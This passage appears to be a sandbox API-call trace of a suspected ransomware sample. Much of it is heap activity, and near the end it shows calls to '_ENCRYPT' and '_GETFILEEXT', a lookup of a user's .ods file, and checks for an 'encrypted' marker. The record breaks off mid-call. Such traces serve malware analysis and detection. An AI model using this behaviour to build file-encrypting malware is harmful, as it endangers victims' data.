RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.948] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.949] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.950] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.950] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.951] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0033.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.951] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.952] CloseHandle (hObject=0x128) returned 1 [0033.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.952] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.952] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.953] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.953] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.953] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.953] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.953] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.953] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x39aa5d90, ftLastWriteTime.dwHighDateTime=0x1d5c27b, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bGB2.ods", cAlternateFileName="")) returned 0x7c20c0 [0033.953] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.954] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.954] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x39aa5d90, ftLastWriteTime.dwHighDateTime=0x1d5c27b, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bGB2.ods", cAlternateFileName="")) returned 0x7c20c0 [0033.954] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.954] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.954] CompareStringW (Locale=0x400, 